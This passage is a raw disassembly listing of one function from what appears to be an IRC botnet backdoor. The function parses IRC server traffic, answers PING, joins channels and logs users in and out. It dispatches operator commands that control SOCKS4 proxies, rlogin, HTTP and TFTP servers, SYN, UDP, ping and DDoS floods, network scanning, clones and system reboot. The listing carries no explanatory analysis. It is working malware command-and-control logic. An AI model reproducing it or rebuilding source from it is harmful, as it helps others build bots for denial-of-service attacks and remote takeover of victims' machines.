jz short loc_4096A4
cmp byte ptr [eax], 2Dh
jnz short loc_4096AC
cmp [eax+2], bl
jnz short loc_4096AC
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_A14], 1
mov esi, [ebp+Str2]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_4096A4: ; CODE XREF: sub_409557+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_409678
loc_4096AC: ; CODE XREF: sub_409557+12A�j
; sub_409557+12F�j
cmp [ebp+var_9A1], bl
jz short loc_4096B7
mov [ebp+var_8], edi
loc_4096B7: ; CODE XREF: sub_409557+15B�j
cmp [ebp+var_9A6], bl
jz short loc_4096C5
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_4096C5: ; CODE XREF: sub_409557+166�j
cmp byte ptr [esi], 0Ah
jz short loc_4096FF
push 7Fh ; Count
lea eax, [ebp+var_A94]
push esi ; Source
push eax ; Dest
call _strncpy
lea eax, [esi+1]
push 17h ; Count
push eax ; Source
lea eax, [ebp+var_C4]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_C4]
push offset asc_42734C ; "!"
push eax ; Str
call _strtok
add esp, 20h
loc_4096FF: ; CODE XREF: sub_409557+171�j
push esi ; Str2
push offset aPing ; "PING"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409750
push dword ptr [ebp+Args] ; Args
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_4097F4
push [ebp+arg_C]
push [ebp+arg_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
add esp, 10h
jmp loc_4097F4
; ---------------------------------------------------------------------------
loc_409750: ; CODE XREF: sub_409557+1B7�j
mov esi, dword ptr [ebp+Args]
push esi ; Str2
push offset a001 ; "001"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E96C
push esi ; Str2
push offset a005 ; "005"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E96C
push esi ; Str2
push offset a302 ; "302"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4097BB
push offset a@ ; "@"
push [ebp+var_88] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4097F4
inc eax
push 9Fh ; Count
push eax ; Source
push [ebp+arg_1C] ; Dest
call _strncpy
add esp, 0Ch
jmp short loc_4097F4
; ---------------------------------------------------------------------------
loc_4097BB: ; CODE XREF: sub_409557+238�j
push esi ; Str2
push offset a433 ; "433"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4097FB
push ebx ; Str1
push dword_424A6C ; int
push dword_424A68 ; int
push [ebp+Dest] ; Dest
call sub_40FA38
push [ebp+Dest] ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
add esp, 1Ch
loc_4097F4: ; CODE XREF: sub_409557+1D8�j
; sub_409557+1F4�j ...
mov eax, edi
jmp loc_4099D5
; ---------------------------------------------------------------------------
loc_4097FB: ; CODE XREF: sub_409557+273�j
mov esi, [ebp+Str1]
mov [ebp+var_A4], 2
mov edi, 80h
loc_40980D: ; CODE XREF: sub_409557+2DB�j
lea eax, [ebp+var_A94]
push eax ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40982A
mov [ebp+var_AC], 1
loc_40982A: ; CODE XREF: sub_409557+2C7�j
add esi, edi
dec [ebp+var_A4]
jnz short loc_40980D
mov esi, dword ptr [ebp+Args]
push esi ; Str2
push offset aKick ; "KICK"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409921
mov esi, [ebp+Str1]
mov [ebp+File], 2
loc_409859: ; CODE XREF: sub_409557+38F�j
cmp [esi], bl
jz loc_4098E1
push 7Fh ; Count
lea eax, [ebp+var_A94]
push esi ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_C4]
add esp, 0Ch
test eax, eax
jz short loc_4098E1
cmp [ebp+var_88], ebx
jz short loc_4098E1
push [ebp+var_88] ; Str2
lea eax, [ebp+var_C4]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4098E1
lea eax, [ebp+var_C4]
mov [esi], bl
push eax
lea eax, [ebp+Dst]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
lea eax, [ebp+Dst]
push eax
call sub_402D63
add esp, 20h
loc_4098E1: ; CODE XREF: sub_409557+304�j
; sub_409557+324�j ...
add esi, edi
dec [ebp+File]
jnz loc_409859
push [ebp+var_88] ; Str2
push [ebp+Dest] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4099D2
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8] ; Args
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_409914: ; CODE XREF: sub_409557+5FC�j
; sub_409557+83F�j ...
push [ebp+arg_4] ; int
call sub_405E1E
jmp loc_40E240
; ---------------------------------------------------------------------------
loc_409921: ; CODE XREF: sub_409557+2F2�j
push esi ; Str2
push offset aNick ; "NICK"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409A67
mov eax, [ebp+var_8C]
mov esi, [ebp+Str1]
inc eax
mov [ebp+Src], 2
mov [ebp+File], eax
loc_40994A: ; CODE XREF: sub_409557+445�j
lea eax, [ebp+var_A94]
push eax ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409997
lea eax, [ebp+var_A94]
push 21h ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_409997
push [ebp+File] ; Source
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax ; Dest
call _strcpy
push [ebp+arg_1C] ; Source
push edi ; Dest
call _strcat
add esp, 10h
mov edi, 80h
loc_409997: ; CODE XREF: sub_409557+404�j
; sub_409557+41B�j
add esi, edi
dec [ebp+Src]
jnz short loc_40994A
lea eax, [ebp+var_C4]
test eax, eax
jz short loc_4099D2
cmp [ebp+File], ebx
jz short loc_4099D2
push [ebp+Dest] ; Str2
lea eax, [ebp+var_C4]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4099DA
push 0Fh ; Count
push [ebp+File] ; Source
push [ebp+Dest] ; Dest
call _strncpy
add esp, 0Ch
loc_4099D2: ; CODE XREF: sub_409557+5B�j
; sub_409557+F1�j ...
push 1
loc_4099D4: ; CODE XREF: sub_409557+4FAA�j
pop eax
loc_4099D5: ; CODE XREF: sub_409557+29F�j
; sub_409557+3527�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4099DA: ; CODE XREF: sub_409557+469�j
mov edi, [ebp+Str1]
xor esi, esi
loc_4099DF: ; CODE XREF: sub_409557+4A9�j
cmp [edi], bl
jz short loc_4099F6
lea eax, [ebp+var_A94]
push eax ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409A04
loc_4099F6: ; CODE XREF: sub_409557+48A�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_4099DF
jmp short loc_4099D2
; ---------------------------------------------------------------------------
loc_409A04: ; CODE XREF: sub_409557+49D�j
lea eax, [ebp+var_A94]
push 21h ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+Src], eax
jz short loc_4099D2
push eax ; Str
call _strlen
push [ebp+File] ; Str
mov edi, eax
call _strlen
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja short loc_4099D2
push [ebp+Src]
shl esi, 7
push [ebp+File]
add esi, [ebp+Str1]
push offset aSS_3 ; ":%s%s"
push esi ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+var_4AC]
push ebx ; int
push eax ; int
push [ebp+arg_8] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 24h
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_409A67: ; CODE XREF: sub_409557+3D9�j
push esi ; Str2
push offset aPart ; "PART"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409A89
push esi ; Str2
push offset aQuit ; "QUIT"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409AB0
loc_409A89: ; CODE XREF: sub_409557+51F�j
mov edi, [ebp+Str1]
xor esi, esi
loc_409A8E: ; CODE XREF: sub_409557+557�j
cmp [edi], bl
jz short loc_409AA4
push [ebp+Str2] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409AF7
loc_409AA4: ; CODE XREF: sub_409557+539�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_409A8E
loc_409AB0: ; CODE XREF: sub_409557+530�j
push dword ptr [ebp+Args] ; Str2
push offset a353 ; "353"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409B58
push [ebp+Str] ; Str2
push [ebp+arg_8] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409AE7
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_409AE7: ; CODE XREF: sub_409557+585�j
push [ebp+Str]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_40E960
; ---------------------------------------------------------------------------
loc_409AF7: ; CODE XREF: sub_409557+54B�j
mov eax, [ebp+Str1]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+Dst]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_402D63
push dword ptr [ebp+Args] ; Str2
push offset aPart ; "PART"
call _strcmp
add esp, 18h
test eax, eax
jnz loc_4099D2
lea eax, [ebp+Dst]
push eax
mov eax, [ebp+Str2]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_409914
; ---------------------------------------------------------------------------
loc_409B58: ; CODE XREF: sub_409557+56D�j
push dword ptr [ebp+Args] ; Str2
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi ; Str1
call _strcmp
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_409BAC
push dword ptr [ebp+Args] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409BAC
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40E7D9
cmp dword_424A54, ebx
jz loc_40E7D9
loc_409BAC: ; CODE XREF: sub_409557+61B�j
; sub_409557+62D�j
push dword ptr [ebp+Args] ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409CB2
push dword ptr [ebp+Args] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409CB2
mov eax, [ebp+var_88]
inc [ebp+Str]
push 4
mov [ebp+var_8C], eax
pop esi
mov [ebp+var_A8], esi
loc_409BF3: ; CODE XREF: sub_409557+817�j
; sub_409557+853�j ...
shl esi, 2
mov ecx, [ebp+esi+Str2]
lea eax, [ebp+esi+Str2]
lea edi, [ecx+1]
mov [eax], edi
mov al, [ecx]
cmp al, byte_424A60
mov [ebp+arg_C], edi
jnz loc_4099D2
push edi ; Str2
push offset aHi ; "hi"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E7E1
push edi ; Str2
push offset aFr ; "Fr"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E7E1
cmp [ebp+var_AC], ebx
jnz short loc_409C66
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40E7D9
loc_409C66: ; CODE XREF: sub_409557+6F3�j
cmp [ebp+arg_28], ebx
jnz loc_40E7D9
cmp dword_424E64, ebx
mov [ebp+arg_8], ebx
jle loc_409F48
mov [ebp+arg_20], offset Str1
loc_409C85: ; CODE XREF: sub_409557+754�j
push edi ; Str2
push [ebp+arg_20] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409DDA
inc [ebp+arg_8]
add [ebp+arg_20], 0B8h
mov eax, [ebp+arg_8]
cmp eax, dword_424E64
jl short loc_409C85
jmp loc_409F48
; ---------------------------------------------------------------------------
loc_409CB2: ; CODE XREF: sub_409557+665�j
; sub_409557+67B�j
push dword ptr [ebp+Args] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409CCB
mov [ebp+var_4], 1
loc_409CCB: ; CODE XREF: sub_409557+76B�j
cmp [ebp+var_8C], ebx
jz loc_4099D2
push offset asc_42726C ; "#"
push [ebp+var_8C] ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_409CF2
cmp [ebp+var_4], ebx
jz short loc_409CFE
loc_409CF2: ; CODE XREF: sub_409557+794�j
lea eax, [ebp+var_C4]
mov [ebp+var_8C], eax
loc_409CFE: ; CODE XREF: sub_409557+799�j
cmp [ebp+var_88], ebx
jz loc_4099D2
inc [ebp+var_88]
jz short loc_409D4A
cmp [ebp+Dest], ebx
jz short loc_409D4A
lea eax, [ebp+var_564]
push eax ; Str
call _strlen
push eax ; MaxCount
lea eax, [ebp+var_564]
push [ebp+var_88] ; Str2
push eax ; Str1
call _strncmp
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_A8], esi
jmp short loc_409D50
; ---------------------------------------------------------------------------
loc_409D4A: ; CODE XREF: sub_409557+7B9�j
; sub_409557+7BE�j
mov esi, [ebp+var_A8]
loc_409D50: ; CODE XREF: sub_409557+7F1�j
mov edi, [ebp+esi*4+Str2]
cmp edi, ebx
jz loc_4099D2
push edi ; Str2
push offset dword_427260 ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409BF3
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz short loc_409D9B
mov eax, dword_475254
mov eax, off_424B14[eax*4]
cmp [eax], bl
jz short loc_409D9B
push eax
push ecx
push offset dword_427244
jmp loc_409914
; ---------------------------------------------------------------------------
loc_409D9B: ; CODE XREF: sub_409557+826�j
; sub_409557+836�j
push edi ; Str2
push offset dword_42723C ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409BF3
mov eax, dword ptr [ebp+esi*4+Args]
cmp eax, ebx
jz loc_409BF3
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz loc_409BF3
push eax
push ecx
push offset dword_427224
jmp loc_409914
; ---------------------------------------------------------------------------
loc_409DDA: ; CODE XREF: sub_409557+73B�j
push offset asc_427350 ; " :"
push [ebp+Src] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_4099D2
mov edi, [ebp+arg_8]
mov cl, byte_424A60
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_424A60
mov [eax+3], cl
lea ecx, dword_42F7D8[edi]
push 9Fh ; Count
add eax, 4
push ecx ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+esi+var_54]
add esp, 0Ch
mov [ebp+arg_8], 0Fh
mov [ebp+arg_20], eax
loc_409E32: ; CODE XREF: sub_409557+983�j
push [ebp+arg_8]
lea eax, [ebp+SubStr]
push offset aD ; "$%d-"
push eax ; Dest
call _sprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_409E9E
mov eax, [ebp+arg_20]
cmp [eax], ebx
jz short loc_409E9E
lea eax, Str1[edi]
push eax ; Str
call _strlen
add [ebp+var_C], eax
pop ecx
jz short loc_409ED0
mov eax, [ebp+arg_20]
push dword ptr [eax-4] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_409ED0
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_406DDF
add esp, 0Ch
jmp short loc_409ED0
; ---------------------------------------------------------------------------
loc_409E9E: ; CODE XREF: sub_409557+903�j
; sub_409557+90A�j
mov eax, [ebp+arg_20]
cmp [eax], ebx
jnz short loc_409ED0
lea eax, [ebp+SubStr]
push 2 ; Count
push eax ; Source
lea eax, [ebp+Source]
push eax ; Dest
call _strncpy
lea eax, [ebp+Source]
mov [ebp+var_12], bl
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_406DDF
add esp, 18h
loc_409ED0: ; CODE XREF: sub_409557+91C�j
; sub_409557+930�j ...
dec [ebp+arg_8]
sub [ebp+arg_20], 4
cmp [ebp+arg_8], ebx
jg loc_409E32
lea eax, [ebp+esi+var_54]
mov [ebp+arg_8], 10h
mov edi, eax
loc_409EED: ; CODE XREF: sub_409557+9E2�j
push [ebp+arg_8]
lea eax, [ebp+SubStr]
push offset aD_1 ; "$%d"
push eax ; Dest
call _sprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_409F30
mov eax, [edi]
cmp eax, ebx
jz short loc_409F30
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_406DDF
add esp, 0Ch
loc_409F30: ; CODE XREF: sub_409557+9BE�j
; sub_409557+9C4�j
dec [ebp+arg_8]
sub edi, 4
cmp [ebp+arg_8], ebx
jg short loc_409EED
mov edi, [ebp+arg_C]
mov [ebp+var_C8], 1
loc_409F48: ; CODE XREF: sub_409557+721�j
; sub_409557+756�j
mov al, [edi]
cmp al, byte_424A60
jz short loc_409F5E
cmp [ebp+var_C8], ebx
jz loc_40A143
loc_409F5E: ; CODE XREF: sub_409557+9F9�j
push [ebp+Dest] ; Source
mov edi, [ebp+Src]
push offset aMe ; "$me"
push edi ; Src
call sub_406DDF
lea eax, [ebp+var_C4]
push eax ; Source
push offset aUser_1 ; "$user"
push edi ; Src
call sub_406DDF
push [ebp+var_8C] ; Source
push offset aChan ; "$chan"
push edi ; Src
call sub_406DDF
push ebx ; Str1
push ebx ; int
lea eax, [ebp+SubStr]
push 2 ; int
push eax ; Dest
call sub_40FA38
push eax ; Source
push offset aRndnick ; "$rndnick"
push edi ; Src
call sub_406DDF
add esp, 40h
push [ebp+arg_14] ; Source
push offset aServer ; "$server"
push edi ; Src
call sub_406DDF
mov edi, offset aChr ; "$chr("
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
loc_409FD0: ; CODE XREF: sub_409557+B65�j
test eax, eax
jz loc_40A0C1
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
mov [ebp+Dest], eax
add eax, 5
push 4 ; Count
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; Dest
call _strncpy
lea eax, [ebp+SubStr]
push offset asc_4271E4 ; ")"
push eax ; Str
call _strtok
add esp, 1Ch
cmp [ebp+SubStr], 30h
jl short loc_40A01C
cmp [ebp+SubStr], 39h
jle short loc_40A032
loc_40A01C: ; CODE XREF: sub_409557+ABA�j
push 3 ; Count
lea eax, [ebp+SubStr]
push offset a63 ; "63"
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_40A032: ; CODE XREF: sub_409557+AC3�j
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
test eax, eax
pop ecx
jle short loc_40A055
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
pop ecx
mov [ebp+Source], al
jmp short loc_40A066
; ---------------------------------------------------------------------------
loc_40A055: ; CODE XREF: sub_409557+AEA�j
call _rand
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+Source], dl
loc_40A066: ; CODE XREF: sub_409557+AFC�j
lea eax, [ebp+SubStr]
mov [ebp+var_13], bl
push eax ; Str
call _strlen
mov [ebp+arg_8], eax
push 0Ch ; Size
lea eax, [ebp+SubStr]
push ebx ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_8]
add eax, 6
push eax ; Count
lea eax, [ebp+SubStr]
push [ebp+Dest] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_406DDF
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 30h
jmp loc_409FD0
; ---------------------------------------------------------------------------
loc_40A0C1: ; CODE XREF: sub_409557+A7B�j
mov edi, 1FFh
lea eax, [ebp+var_F9C]
push edi ; Count
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_F9C]
push edi ; Count
push eax ; Source
lea eax, [ebp+var_119C]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_119C]
push offset Delim ; " "
push eax ; Str
call _strtok
add esp, 20h
mov [ebp+Str2], eax
lea edi, [ebp+Args]
mov [ebp+Dest], 1Fh
loc_40A111: ; CODE XREF: sub_409557+BCF�j
push offset Delim ; " "
push ebx ; Str
call _strtok
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+Dest]
pop ecx
jnz short loc_40A111
mov ecx, [ebp+esi+Str2]
lea eax, [ebp+esi+Str2]
cmp ecx, ebx
jz loc_4099D2
add ecx, 3
mov [eax], ecx
loc_40A143: ; CODE XREF: sub_409557+A01�j
mov edi, [ebp+esi+Str2]
push edi ; Str2
push offset aRndnick_0 ; "rndnick"
mov [ebp+Dest], edi
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E78C
push edi ; Str2
push offset aRn ; "rn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E78C
push edi ; Str2
push offset aDie ; "die"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E76A
push edi ; Str2
push offset aD_0 ; "d"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E76A
push edi ; Str2
push offset aLogout ; "logout"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E6BF
push edi ; Str2
push offset aLo ; "lo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E6BF
push edi ; Str2
push offset aVersion ; "version"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E6B0
push edi ; Str2
push offset aVer ; "ver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E6B0
push edi ; Str2
push offset aSocks4 ; "socks4"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E58E
push edi ; Str2
push offset aS4 ; "s4"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E58E
push edi ; Str2
push offset aSocks4stop ; "socks4stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A248
push dword ptr [ebp+esi+Args]
push 11h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A248: ; CODE XREF: sub_409557+CD7�j
push edi ; Str2
push offset aRloginstop ; "rloginstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A271
push dword ptr [ebp+esi+Args]
push 6
push offset aServer_0 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A271: ; CODE XREF: sub_409557+D00�j
push edi ; Str2
push offset aHttpstop ; "httpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A29A
push dword ptr [ebp+esi+Args]
push 3
push offset aServer_0 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A29A: ; CODE XREF: sub_409557+D29�j
push edi ; Str2
push offset aLogstop ; "logstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A2C3
push dword ptr [ebp+esi+Args]
push 1Ch
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A2C3: ; CODE XREF: sub_409557+D52�j
push edi ; Str2
push offset aRedirectstop ; "redirectstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A2EC
push dword ptr [ebp+esi+Args]
push 10h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect ; "[REDIRECT]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A2EC: ; CODE XREF: sub_409557+D7B�j
push edi ; Str2
push offset aDdos_stop ; "ddos.stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A315
push dword ptr [ebp+esi+Args]
push 0Ah
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A315: ; CODE XREF: sub_409557+DA4�j
push edi ; Str2
push offset aSynstop ; "synstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A33E
push dword ptr [ebp+esi+Args]
push 0Bh
push offset aSynFlood ; "Syn flood"
push offset aSyn ; "[SYN]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A33E: ; CODE XREF: sub_409557+DCD�j
push edi ; Str2
push offset aUdpstop ; "udpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A367
push dword ptr [ebp+esi+Args]
push 0Fh
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A367: ; CODE XREF: sub_409557+DF6�j
push edi ; Str2
push offset aPingstop ; "pingstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A390
push dword ptr [ebp+esi+Args]
push 0Eh
push offset aPingFlood ; "Ping flood"
push offset aPing_0 ; "[PING]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A390: ; CODE XREF: sub_409557+E1F�j
push edi ; Str2
push offset aTftpstop ; "tftpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A3B9
push dword ptr [ebp+esi+Args]
push 4
push offset aServer_0 ; "Server"
push offset aTftp ; "[TFTP]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A3B9: ; CODE XREF: sub_409557+E48�j
push edi ; Str2
push offset aProcsstop ; "procsstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E55F
push edi ; Str2
push offset aPsstop ; "psstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E55F
push edi ; Str2
push offset aClonestop ; "clonestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A40C
push dword ptr [ebp+esi+Args]
push 17h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A40C: ; CODE XREF: sub_409557+E9B�j
push edi ; Str2
push offset aSecurestop ; "securestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A435
push dword ptr [ebp+esi+Args]
push 19h
push offset aSecure ; "Secure"
push offset aSecure_0 ; "[SECURE]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A435: ; CODE XREF: sub_409557+EC4�j
push edi ; Str2
push offset aScanstop ; "scanstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A45E
push dword ptr [ebp+esi+Args]
push 8
push offset aScan ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A45E: ; CODE XREF: sub_409557+EED�j
push edi ; Str2
push offset aScanstats ; "scanstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E549
push edi ; Str2
push offset aStats ; "stats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E549
push edi ; Str2
push offset aReconnect ; "reconnect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E528
push edi ; Str2
push offset aR ; "r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E528
push edi ; Str2
push offset aDisconnect ; "disconnect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E506
push edi ; Str2
push offset aDc ; "dc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E506
push edi ; Str2
push offset aQuit_0 ; "quit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E4BE
push edi ; Str2
push offset aQ ; "q"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E4BE
push edi ; Str2
push offset aStatus ; "status"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E480
push edi ; Str2
push offset aS_7 ; "s"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E480
push edi ; Str2
push offset aId ; "id"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E449
push edi ; Str2
push offset aI_0 ; "i"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E449
push edi ; Str2
push offset aReboot ; "reboot"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A5AC
call sub_407228
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_40A57E
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_40A57E: ; CODE XREF: sub_409557+1020�j
push eax ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
